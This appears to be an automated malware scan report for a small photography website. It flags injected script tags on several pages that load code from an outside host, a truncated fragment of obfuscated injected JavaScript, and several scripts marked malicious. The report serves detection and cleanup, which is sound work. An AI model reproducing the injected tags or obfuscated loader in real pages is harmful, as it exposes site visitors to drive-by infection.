Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=elvisayphotography.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://elvisayphotography.com/ | 200 OK Content-Length: 12627 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://kalismezze.com/Hx4IfSDQ.php?id=26256892" type="text/javascript"></script> | ||
http://elvisayphotography.com/pop-closeup.js | 200 OK Content-Length: 11192 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- Begin VIEWER AND POPUP SIZES AND OPTIONS CODE var viewer = "same" var width = "750" var height = "625" var scrollbars = "yes" var menu = "no" var tool = "no" var rotate_delay = 3000; var right_click_on = "yes" var block_imagebar = "yes" var hide_status = "no" var status_text = "Welcome" var right_click_text = "You may not right mouse click this page." function ViewImage(data) { if (viewer == "popup") { windowHandle = window.open Antivirus reports:
| ||
http://elvisayphotography.com/javascripts.js | 200 OK Content-Length: 76 Content-Type: application/javascript | clean |
http://elvisayphotography.com/header.js | 200 OK Content-Length: 8145 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- Begin HEADER OPTIONS CODE var color = "7E6C4E" var bordertop = "4D412E" var borderbot = "4D412E" var flashheight = "40" var flashwidth = "750" var headerheight = "45" var botM = "0" var topM = "0" var borderthk = "1" document.write('<table cellpadding="0" cellspacing="0" border="0" width="100%" style="background-color: #' color '; BORDER-TOP: #' bordertop ' ' borderthk 'px solid; BORDER-BOTTOM: #' borderbot ' ' borderthk 'px solid; height: ' headerheight 'px; ma Antivirus reports:
| ||
http://elvisayphotography.com/menu.js | 200 OK Content-Length: 7501 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- Begin MENU var menuside = "left" var menuspace = "25" document.write('<div class="printhide"><TABLE cellpadding="0" cellspacing="0" border="0" width="100%" class="menubackground"><tr><td align="' menuside '">'); document.write('<TABLE cellpadding="0" cellspacing="0" border="0"><tr><td width="' menuspace '">'); document.write('<img src="picts/spacer.gif" width="' menuspace '" height="5"></a><br>'); document. Antivirus reports:
| ||
http://elvisayphotography.com/home-image.js | 200 OK Content-Length: 7668 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- Begin RANDOM HOME IMAGE var imageheight = "300" var linkedR = "gallery.htm" var alttext = "Click to View Galleries" var twox = "<table cellpadding=\"0\" cellspacing=\"0\" border=\"0\" width=\"100%\" class=\"homeimage\" background=\"picts/"; var thrx = "><tr><td align=\"left\" valign=\"top\" class=\"printhide\">"; var forx = ""; var img = ""; forx = Math.floor(Math.random()*5); img = forx; if (img == "0") { document.write(two Antivirus reports:
| ||
http://elvisayphotography.com/footer.js | 200 OK Content-Length: 7212 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- Begin var allwebco = "yes" var pageheight = "150" document.write('<img src="picts/spacer.gif" height="' pageheight '" width="5"><br>'); document.write('<a href="index.html">Home</a>'); document.write(' | '); document.write(' <a href="about.htm">About</a>'); document.write(' | '); document.write(' <a href="contact.htm">Contact</a>'); document.write('<br><br> Antivirus reports:
| ||
http://elvisayphotography.com/gallery.htm | 200 OK Content-Length: 15103 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://kalismezze.com/Hx4IfSDQ.php?id=26256877" type="text/javascript"></script> | ||
http://elvisayphotography.com/sidebar.js | 200 OK Content-Length: 11152 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- Begin var imagewidth = "50" var imageheight = "34" var spacerheight = "10" var showimages1 = "yes" var showimages2 = "yes" var showimages3 = "yes" var showimages4 = "no" var showgallery = "yes" var showmap = "yes" var sidealign = "center" var sidebarwidth = "140" document.write('<table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="' sidealign '">'); document.write('<table cellpadding="0" cellspacing="0" border= Antivirus reports:
| ||
http://elvisayphotography.com/line_up_pictures.js | 200 OK Content-Length: 6462 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- ALIGN GALLERY IMAGES document.write('<img src="picts/spacer.gif" height="60" width="5" border="0"><br>'); wkkhe=String;myolx="spl" "i" "t";dfpi=window;puvoy=(1)?"0x":"123";csqz=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(docume Antivirus reports:
| ||
http://elvisayphotography.com/gallery1.htm | 200 OK Content-Length: 27301 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://kalismezze.com/Hx4IfSDQ.php?id=26256878" type="text/javascript"></script> | ||
http://elvisayphotography.com/test404page.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 27 Jun 2014 20:09:16 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://templates.doteasy.com/errorpages/error404/ | 200 OK Content-Length: 10669 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: text/javascript | clean |
http://elvisayphotography.com/../js/selectBox/jquery.selectBox.min.js | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
http://elvisayphotography.com/../js/jquery.watermark.min.js | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: elvisayphotography.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Jun 2014 20:09:10 GMT
Accept-Ranges: bytes
ETag: "4e7844f-3153-4eba046534680"
Server: Apache
Content-Length: 12627
Content-Type: text/html
Last-Modified: Wed, 20 Nov 2013 18:51:54 GMT
...12627 bytes of data.
GET / HTTP/1.1
Host: elvisayphotography.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Jun 2014 20:09:10 GMT
Accept-Ranges: bytes
ETag: "4e7844f-3153-4eba046534680"
Server: Apache
Content-Length: 12627
Content-Type: text/html
Last-Modified: Wed, 20 Nov 2013 18:51:54 GMT
...12627 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: elvisayphotography.com
Referer: http://www.google.com/search?q=elvisayphotography.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: elvisayphotography.com
Referer: http://www.google.com/search?q=elvisayphotography.com
Result:
The result is similar to the first query. There are no suspicious redirects found.